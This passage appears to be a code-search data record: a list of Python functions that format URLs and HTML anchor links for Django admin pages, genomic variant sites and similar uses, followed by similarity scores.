indicate that it's to be\n # rendered in a browser. 
If so, we'll render the link as clickable <a href=\"...\">.\n if self.is_html:\n return f\"<a href='{url}'>{url}</a>\"\n return url", "def to_html(self) -> str:\n return f'''\n <a href=\"{self.link}\"> ({self.source_name}, {self.timestamp.strftime('%Y')}) </a>\n '''", "def view_sample_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (url_for(\"sample.index_view\", search=model.sample.internal_id), model.sample,)\n )\n if model.sample\n else u\"\"\n )", "def channel_link(self, obj):\n if obj.channel is None:\n return '\\N{EM DASH}'\n\n return format_html(\n '<a href=\"{}\">{}</a>',\n reverse('admin:mediaplatform_channel_change', args=(obj.channel.pk,)),\n obj.channel.title if obj.channel.title != '' else '[Untitled]'\n )", "def object_url(self, object_t, object_id=None, relation=None):\n if object_t not in self.objects_types:\n raise TypeError(f\"{object_t} is not a valid type\")\n request_items = (\n str(item) for item in [object_t, object_id, relation] if item is not None\n )\n request_path = \"/\".join(request_items)\n return self.url(request_path)", "def __url(self, object):\n return '/'.join(object.getPhysicalPath())", "def exac_link(variant_obj):\n url_template = (\"http://exac.broadinstitute.org/variant/\"\n \"{this[chromosome]}-{this[position]}-{this[reference]}\"\n \"-{this[alternative]}\")\n return url_template.format(this=variant_obj)", "def calendar_view_link(calendar):\n linkdef = {\n \"label\": calendar.name, \"modal\": True,\n \"title\": _(\"View calendar detail\")\n }\n if calendar.__class__.__name__ == \"UserCalendar\":\n linkdef[\"url\"] = reverse(\n \"modoboa_radicale:user_calendar_detail\", args=[calendar.pk]\n )\n else:\n linkdef[\"url\"] = reverse(\n \"modoboa_radicale:shared_calendar_detail\", args=[calendar.pk]\n )\n return render_link(linkdef)", "def get_links(self, obj):\n request = self.context['request']\n detail_name = '{}-detail'.format(get_model_name(obj.__class__))\n return {\n 'self': reverse(detail_name, kwargs={'pk': obj.pk}, request=request),\n }", "def format_link_segment(value):\n format_type = json_api_settings.FORMAT_RELATED_LINKS\n return format_value(value, format_type)", "def make_absolute_object_link(db,id,bytes = []):\n href = db.locals[\"db_url\"] +\"/dispatcher.py/\" + \"/\".join(str(x) for x in id)\n if bytes:\n href += byte_query(bytes)\n return href", "def __repr__(self):\n if self.rest:\n rest_repr = ', ' + repr(self.rest)\n else:\n rest_repr = ''\n return 'Link({0}{1})'.format(self.first, rest_repr)", "def format_item_display(self, obj):\n return u\"%s - %s\" % (escape(obj.nombre),obj.rfc)", "def format_link(self):\n self.url = sys.argv[1]\n video_link_regex = re.compile(\n r'(https?://)?(www\\.)?youtube\\.(com|nl)/watch\\?v=([\\w-]+)')\n playlist_link_regex = re.compile(\n r'(https?://)?(www\\.)?youtube\\.(com|nl)/playlist\\?list=([\\w-]+)')\n # check if it's a single video link\n if video_link_regex.search(self.url):\n result_regex = video_link_regex.search(self.url)\n self. url = result_regex.group().split('&')[0]\n self.show_formats()\n # check if it's a playlist link\n elif playlist_link_regex.search(self.url):\n logging. debug('Yes it a playlist')\n result_regex = playlist_link_regex.search(self.url)\n playlist_link = result_regex.group().split('&')[0]\n self. get_videos_in_playlist()\n # check if link is not a youtube link\n else:\n logging.debug('Not even a yt link')\n sys. 
exit()", "def gnomad_link(variant_obj):\n url_template = (\"http://gnomad.broadinstitute.org/variant/{this[chromosome]}-\"\n \"{this[position]}-{this[reference]}-{this[alternative]}\")\n return url_template.format(this=variant_obj)", "def label_link(self, obj):\n if not obj.record_label:\n return None\n url = reverse(\n 'admin:music_publisher_label_change', args=[obj.record_label.id])\n link = '<a href=\"{}\">{}</a>'.format(url, obj.record_label)\n return mark_safe(link)", "def url_for_object(self, key: typing.Optional[str]=None) -> str:\n ...", "def requestShowLink(self, *args, **kwargs): # real signature unknown\n pass", "def entry_shortlink(request, object_id):\n entry = get_object_or_404(Entry, pk=object_id)\n return redirect(entry, permanent=True)", "def make_object_link(philo_id, hit_bytes):\n href = \"./\" + \"/\".join(str(x) for x in philo_id) + byte_query(hit_bytes)\n return href", "def view_family_sample_link(unused1, unused2, model, unused3):\n\n del unused1, unused2, unused3\n\n return Markup(\n u\"<a href='%s'>%s</a>\"\n % (url_for(\"familysample.index_view\", search=model.internal_id), model.internal_id,)\n )", "def get_anchor_tag(self):\n return f\"<a href={self.get_absolute_url()}>{self.display_name}</a>\"", "async def link_to(self, *args):\n pass", "def format_link(self, link):\n new_link = \"/\".join(link.split(\"/\")[0:3])\n return \"http://www.imdb.com\" + new_link", "def path_for(objectid):", "def url(self):\n if self.term_type != 'C':\n url_fmt = self.path_level_url_fmt\n url_info = {'id': self.term_type}\n else:\n url_fmt = self.obj_level_url_fmt\n url_info = {'org_prefix': self.org_prefix, 'id': self.term_id}\n\n return url_fmt % url_info", "def format_match(self, obj):\n return self.format_item_display(obj)", "def format_match(self, obj):\n return self.format_item_display(obj)", "def url_to_edit(obj):\n return reverse(\n 'admin:%s_%s_change' % (obj._meta.app_label, obj._meta.model_name),\n args=[obj.id]\n )", "def print_link(link):\n print('<' + helper(link).rstrip() + '>')", "def format_url(self, url, text):\r\n return u'<a href=\"%s\">%s</a>' % (escape(url), text)", "def get_url(self):\n if self.object_id is None:\n return '{0}/{1}'.format(self.parent.get_url(), self.path)\n\n return '{0}/{1}/{2}'.format(self.parent.get_url(), self.path,\n self.object_id.replace('/', '-'))", "def __repr__(self):\n ## return str(self.first) + \" -> \" + repr(self.rest)\n if self.rest is Link.empty:\n rest_str = \"\"\n else:\n rest_str = \", \" + repr(self.rest)\n return \"Link({0}{1})\".format(self.first, rest_str)", "def render_summary(self, record, value):\n review_link = reverse('review-detail', kwargs={'ods_code': record.organisations.all()[0].ods_code, 'cobrand': 'choices', 'api_posting_id': record.api_posting_id})\n return mark_safe(u'<a href=\"{0}\">{1}</a>'.format(review_link, conditional_escape(value)))", "def format_url(self, command):\n\n return '{}{}'.format(self.url,command)", "def get_obj_admin_path(obj):\n from django.contrib.contenttypes.models import ContentType\n content_type = ContentType.objects.get_for_model(obj)\n return '/admin/%s/%s/%s' % (content_type.app_label, content_type.model, str(obj.pk))", "def html_link(self):\n if self.id:\n unescaped_url = f'/themes/{self.name or \"\"}--{self.id}'\n return mark_safe(f'<a href=\"{self.url_path}\" target=\"_blank\">{unescaped_url}</a>')\n else:\n return 'Pas encore live'", "def process_link(self, env, refnode, has_explicit_title, title, target):\n refnode['json:name'] = normalize_object_name(target)\n return title, 
normalize_object_name(target)", "def format(obj): # pylint: disable=W0622\n# print '>>', obj\n if hasattr(obj, 'format'):\n return obj.format()\n return \"%s\" % obj", "def playlist_link(self, obj):\n if obj.playlist is None:\n return '\\N{EM DASH}'\n\n return format_html(\n '<a href=\"{}\">{}</a>',\n reverse('admin:mediaplatform_playlist_change', args=(obj.playlist.pk,)),\n obj.playlist.title if obj.playlist.title != '' else '[Untitled]'\n )", "def version_absolute_url_path(self, obj,date=None):\n date = date if date is not None else obj.bobobase_modification_time()\n version = '/%s%s' % (self.prefix, int(date.timeTime()))\n local_path = self.absolute_url_path()\n parent_path = local_path.replace('/'+self.id, '')\n obj_path = obj.absolute_url_path()\n return local_path + version + obj_path.replace(parent_path, '')", "def render_name(self, record):\n return format_html(\n \"\"\"<a href=\"#\" class=\"js-view-edit\"\n data-toggle=\"tooltip\" data-url=\"{0}\"\n title=\"{1}\">{2}</a>\"\"\",\n reverse('table:view_edit', kwargs={'pk': record['id']}),\n _('Change the columns present in the view'),\n record['name'],\n )", "def get_href(self, obj: Profile):\n request = self.context['request']\n return reverse('accounts:profile', request=request, kwargs={'pk': obj.id})", "def view_application_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (\n url_for(\"application.index_view\", search=model.application.tag),\n model.application.tag,\n )\n )\n if model.application\n else u\"\"\n )", "def subscriber_detail(self):\n model_name = Subscriber._meta.object_name.lower()\n app_label = self._meta.app_label\n link = '/admin/%s/%s/' % (app_label, model_name)\n link += '?campaign__id=%d' % self.id\n display_link = _(\"<a href='%(link)s'>%(name)s</a>\") % \\\n {'link': link, 'name': _('details')}\n return display_link", "def link_view(context, request):\n can_edit = ptah.checkPermission(ptah_cms.ModifyContent, context)\n\n if can_edit:\n vform = form.DisplayForm(context, request) # needs better UI\n vform.fields = Link.__type__.fieldset\n vform.content = {\n 'title': context.title,\n 'description': context.description,\n 'href': context.href}\n vform.update()\n # the below render() would display form html without enclosing layout\n #return vform.render()\n\n \"\"\"\n this should render the display form with layout applied\n The layout is the \"wrapping HTML\" e.g. 
ptah_app layout you\n see at http://localhost:8080/\n \"\"\"\n layout = view.queryLayout(request, context)\n return layout(vform.render())\n\n raise HTTPFound(location=context.href)", "def to_projectlink(self):\n\n thumb_image_url = reverse('project_serve_file', args=[self.short_name,self.logo])\n\n args = {\"abreviation\":self.short_name,\n \"title\":self.short_name,\n \"description\":self.description,\n \"URL\":reverse('comicsite.views.site', args=[self.short_name]),\n \"download URL\":\"\",\n \"submission URL\":self.get_submission_URL(),\n \"event name\":self.event_name,\n \"year\":\"\",\n \"event URL\":self.event_url,\n \"image URL\":self.logo,\n \"thumb_image_url\":thumb_image_url,\n \"website section\":\"active challenges\",\n \"overview article url\":self.publication_url,\n \"overview article journal\":self.publication_journal_name,\n \"overview article citations\":\"\",\n \"overview article date\":\"\",\n \"submission deadline\":\"\",\n \"workshop date\":self.workshop_date,\n \"open for submission\":\"yes\" if self.is_open_for_submissions else \"no\",\n \"data download\":\"yes\" if self.offers_data_download else \"no\",\n \"dataset downloads\":self.number_of_downloads,\n \"registered teams\":\"\",\n \"submitted results\":self.number_of_submissions,\n \"last submission date\":self.last_submission_date,\n \"hosted on comic\":True,\n \"created at\":self.created_at\n }\n\n projectlink = ProjectLink(args)\n return projectlink", "def linkified_description(self):\n links = []\n def linkify(matchobj, links=links):\n if '|' in matchobj.group(1):\n url = matchobj.group(1).split('|')\n link = format_html('<a href=\"{0}\" target=\"_blank\">{1}</a>', url[0], url[1])\n else:\n link = format_html('<a href=\"{0}\" target=\"_blank\">{1}</a>', self.url, matchobj.group(1))\n links.append(link)\n return '{%d}' % (len(links) - 1)\n\n fmt = re.sub(r'\\[\\[([^\\]]+)\\]\\]', linkify, self.description)\n return format_html(fmt, *links)", "def link(self, link):\r\n return links.Link(self, link)", "def cal_link(self):\n return get_host() + reverse('events:detail', args=[self.id])", "def user2Link(user): \n # could also look up mail addrs via a table lookup, etc\n return '<a href=\"mailto:%(user)s@somewebsite.com\">%(user)s</a>' % {\"user\": user}", "def undo_format_link_segment(value):\n\n if json_api_settings.FORMAT_RELATED_LINKS:\n return format_value(value, \"underscore\")\n\n return value", "def format_value(obj, field_name):\n display_func = getattr(obj, 'get_%s_display' % field_name, None)\n if display_func:\n return display_func()\n value = getattr(obj, field_name)\n\n if isinstance(value, models.fields.files.FieldFile):\n if value:\n return mark_safe('<a href=\"%s\">%s</a>' % (\n value.url,\n os.path.basename(value.name),\n ))\n else:\n return ''\n\n if isinstance(value, models.Model):\n return format_value_instance(value)\n\n if isinstance(value, models.Manager):\n return mark_safe(', '.join(\n [format_value_instance(instance) for instance in value.all()]\n ))\n if value is None:\n value = \"\"\n return value", "def edit_link(instance):\n\n try:\n content_type = ContentType.objects.get_for_model(instance.__class__)\n except AttributeError:\n raise ValueError('Passed value must be registered model instance')\n else:\n model_admin_change_link = 'admin:{app}_{model}_change'.format(\n app=content_type.app_label,\n model=content_type.model\n )\n return reverse(model_admin_change_link, args=(instance.id,))", "def get_absolute_url(self):\n\t\treturn reverse('source-detail', args=[str(self.id)])", "def 
_render_link(self, context, name, label, extra=''):\n product = Product.select(self.env, where={'name' : name})\n if product:\n product = product[0]\n href = context.href.products(product.prefix)\n if 'PRODUCT_VIEW' in context.perm(product.resource):\n return tag.a(label, class_='product', href=href + extra)\n elif 'PRODUCT_CREATE' in context.perm('product', name):\n return tag.a(label, class_='missing product', \n href=context.href('products', action='new'),\n rel='nofollow')\n return tag.a(label, class_='missing product')", "def _format_obj(cls, **kwargs):\n def doc_rebuilder(obj):\n if kwargs.pop('_VOID_',False):\n return ''\n try:\n doc = getattr(obj,'__doc__')\n assert doc\n except:\n return ''\n else:\n return doc.format(**kwargs) # str(doc).format(**kwargs)\n return doc_rebuilder", "def render(self, context):\n try:\n # Retrieve the object instance.\n obj = Variable(self.obj).resolve(context)\n except VariableDoesNotExist:\n obj = self.obj\n \n try:\n urlname = 'admin:%s_%s_change' % (\n obj._meta.app_label, obj._meta.module_name\n )\n url = reverse(urlname, args=(obj.pk,))\n except NoReverseMatch, err:\n if settings.TEMPLATE_DEBUG:\n print \"Got an exception resolving an admin url: \", err\n return ''\n \n if self.varname:\n context[self.varname] = url\n else:\n return url", "def get_absolute_url(self):\n return reverse('model-detail-view', args=[str(self.id)])" ]
[ "0.73224676", "0.7216829", "0.7124374", "0.68019325", "0.65847546", "0.64726907", "0.64016116", "0.63936055", "0.6361755", "0.635381", "0.63412184", "0.63111347", "0.6248648", "0.6244252", "0.61723745", "0.61185104", "0.6079688", "0.6079688", "0.60349536", "0.6026926", "0.6017183", "0.6002368", "0.59222513", "0.5901884", "0.5883708", "0.5872645", "0.58527756", "0.5842337", "0.58284605", "0.58029336", "0.58029217", "0.5792112", "0.5787524", "0.5786158", "0.577088", "0.57589257", "0.57504374", "0.5735008", "0.57175756", "0.57063144", "0.5688553", "0.56777245", "0.56621176", "0.5660761", "0.56483155", "0.56337404", "0.56256706", "0.5608898", "0.5590851", "0.558507", "0.557859", "0.55728716", "0.5563868", "0.55496395", "0.55481774", "0.5540833", "0.5526031", "0.5523063", "0.55175793", "0.5502691", "0.5502625", "0.5496755", "0.5495098", "0.54707795", "0.54370236", "0.5428369", "0.54063267", "0.54008967", "0.54008967", "0.5388686", "0.5378782", "0.53771055", "0.5367568", "0.53553843", "0.5355195", "0.53477806", "0.5329413", "0.53293824", "0.5326268", "0.5313031", "0.5310645", "0.5294537", "0.5293742", "0.52923715", "0.5288311", "0.52865934", "0.5285031", "0.52790004", "0.5276834", "0.5275771", "0.5274485", "0.526663", "0.5265255", "0.524917", "0.5248437", "0.5247382", "0.52417517", "0.52333325", "0.5229363", "0.52293473" ]
0.75110674
0